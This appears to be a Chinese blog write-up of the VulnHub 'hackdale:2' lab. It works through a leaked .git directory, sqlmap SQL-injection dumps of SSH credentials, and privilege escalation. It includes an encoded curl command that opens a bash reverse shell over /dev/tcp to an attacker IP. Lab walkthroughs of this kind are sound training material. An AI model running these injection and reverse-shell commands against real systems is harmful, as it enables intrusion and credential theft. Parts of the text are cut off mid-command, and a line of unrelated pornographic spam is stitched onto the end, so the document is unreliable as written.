黑客培訓基地,[VulnHub]hackdale:2靶場記錄

  • 作者:
  • 時間:2022-05-31 09:29:41
簡介 黑客培訓基地,[VulnHub]hackdale:2靶場記錄

簡介

該文章用來提高小白的基礎,記錄每次的靶場練習,學習靶場文章的知識點原理以及工具使用。
抓住知識點理解原理
靶場IP:192.168.1.185

滲透測試

掃描IP

1652931926_6285bd56adabbd0102544.png?1652931929893

掃描端口

1652931940_6285bd64b0112fc549a06.png?1652931944049

掃描發現22、80端口,還存在.git泄露

訪問.git目錄

1652931950_6285bd6e93d144b82fe5f.png?1652931960804

git泄露,上Githack腳本

githack是一個 .git 泄露利用測試腳本,通過泄露文件,還原重建工程源代碼

1652931962_6285bd7a72d46c3b5d480.png?1652931965428

查看config文件

$connect = new mysqli("localhost","root","","darkhole_2");

得到主機,賬號,密碼,數據庫

查看login.php

?php

session_start();

require 'config/config.php';

if($_SERVER['REQUEST_METHOD'] == 'POST'){

$email = mysqli_real_escape_string($connect,htmlspecialchars($_POST['email']));

$pass = mysqli_real_escape_string($connect,htmlspecialchars($_POST['password']));

$check = $connect->query("select * from users where email='$email' and password='$pass' and id=1");

if($check->num_rows){

$_SESSION['userid'] = 1;

header("location:dashboard.php");

die();

}


}

?>


link rel="stylesheet" href="style/login.css">

head>

script src="https://kit.fontawesome.com/fe909495a1.js" crossorigin="anonymous">/script>

link rel="stylesheet" href="Project_1.css">

title>Home/title>

/head>


body>


div class="container">

h1>?? Welcome/h1>

!-- a href="file:///C:/Users/SAURABH%20SINGH/Desktop/HTML5/PROJECTS/Project%201/Project_1.html">h1>Sign In/h1>/a> -->

!-- a href="file:///C:/Users/SAURABH%20SINGH/Desktop/HTML5/PROJECTS/Project%201/P2.html"> ?h1>Log In/h1>/a> -->

form action="" method="post">

div class="box">

i ?class="fas fa-envelope">/i>

input type="email" name="email" id="email" ?placeholder="Enter Your Email" required>

/div>

div class="box">

i ?class="fas fa-key">/i>

input type="password" name="password" id="password" placeholder="Enter Your Password" required>

/div>

button id="btn" name="button">Login/button>

/form>



/div>

mysqli_real_escape_string轉移特殊字符

htmlspecialchars() 函數把一些預定義的字符轉換為 HTML 實體。


git信息獲取

換種思路,用wget將.git拉下來,通過查看相關信息獲得下一步攻擊操作

wget -r http://192.168.1.185/.git

發現沒重要信息,git上面會有歷史信息

通過git log查看歷史版本

1652932024_6285bdb86b58e1f053567.png?1652932027416

查看兩次不同的記錄

1652932033_6285bdc186f7086f89778.png?1652932036609

git diff a4d900a8d85e8938d3601f3cef113ee293028e10

找到登錄后臺地址和賬號密碼

后臺滲透

1652932043_6285bdcb01a064cf694c5.png?1652932046017

找到后臺頁面dashboard.php?id=1

1652932054_6285bdd6b5320f4feeeb9.png?1652932057750

嘗試id=1',頁面報錯

1652932095_6285bdff8004f84821dd2.png?1652932098631

在輸入1' --+ 閉合語句,成功

嘗試了union select的多種WAF,進行不下去了,掏出SQLMAP跑吧


常規的cookie注入

sqlmap -u "http://192.168.1.185/dashboard.php?id=1" --cookie PHPSESSID='svsk4vk4u593chhj9u3kgmkfmi' --current-db

sqlmap -u "http://192.168.1.185/dashboard.php?id=1" --cookie PHPSESSID='svsk4vk4u593chhj9u3kgmkfmi' -D "darkhole_2" --tables

sqlmap -u "http://192.168.1.185/dashboard.php?id=1" --cookie PHPSESSID='svsk4vk4u593chhj9u3kgmkfmi' -D "darkhole_2" -T 'users' --columns

sqlmap -u "http://192.168.1.185/dashboard.php?id=1" --cookie PHPSESSID='svsk4vk4u593chhj9u3kgmkfmi' -D "darkhole_2" -T 'ssh' --columns


數據

sqlmap -u "http://192.168.1.185/dashboard.php?id=1" --cookie PHPSESSID='svsk4vk4u593chhj9u3kgmkfmi' -D "darkhole_2" -T 'ssh' --dump

1652932149_6285be354a993779036a0.png?1652932152257


得到ssh賬號密碼

SSH登錄

ssh jehad@192.168.1.185

1652932156_6285be3c1d37c0f1e851f.png?1652932159052

1652932170_6285be4a6ee567682ef4f.png?1652932173446

提權

查看SUID權限

find / -perm -4000 2>/dev/null

1652932248_6285be98cb33b8dd7f1a8.png?1652932251826

查看用戶密碼

1652932260_6285bea490f1dd907a297.png?1652932263551

1652932268_6285beacd45a0f7f6e276.png?1652932271856

20.04版本不存在臟牛提權,16倒是有

嘗試passwd提權,不行,普通用戶沒有寫權限

1652932276_6285beb4526e9863bec83.png?1652932279406


crontab提權

/etc/crontab文件詳解

1652932301_6285becda084c6f114761.png?1652932304885

Minute ?hour ?day ?month ??dayofweek ??command


Minute :分鐘,0-59之間的任何整數。


Hour:小時, 0-23之間的任何整數。


Day: 日期,從1到31之間的任意整數(如指定了月份,必須是該月份的有效日期)


Month:月份,1到12之間的任意整數(或者使用月份的英文簡寫,如:jan。feb)


Dayofweek 星期,0到7之間的人任意整數,這里的0或7代表星期日




25 6 ???* * * ??root ???test -x /usr/sbin/anacron || ( cd / &1'"

curl執行,進行url編碼,使用bp的url編碼

curl "http://127.0.0.1:9999/?cmd=%62%61%73%68%20%2d%63%20%27%65%78%65%63%20%62%61%73%68%20%2d%69%20%26%3e%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%

提權成功后,通過sudo -l,密碼gang,使用python3執行root shell

滲透思路

1.目錄泄露.git文件

2.通過了解git歷史記錄發現后臺賬號密碼

3.參數ID在SQL注入漏洞,拿到SSH賬號密碼

4.通過端口轉發,且在/opt/web里發現cmd,可以利用CMD反彈shell

5.SUDO -l發現密碼,拿python3執行root shell即可

參考

crontab提權?

Cron Jobs 計劃提權?

韩国19禁A片在线播放,色猫咪免费人成网站在线观看,中国最猛性XXXXX,五月天天爽天天狠久久久综合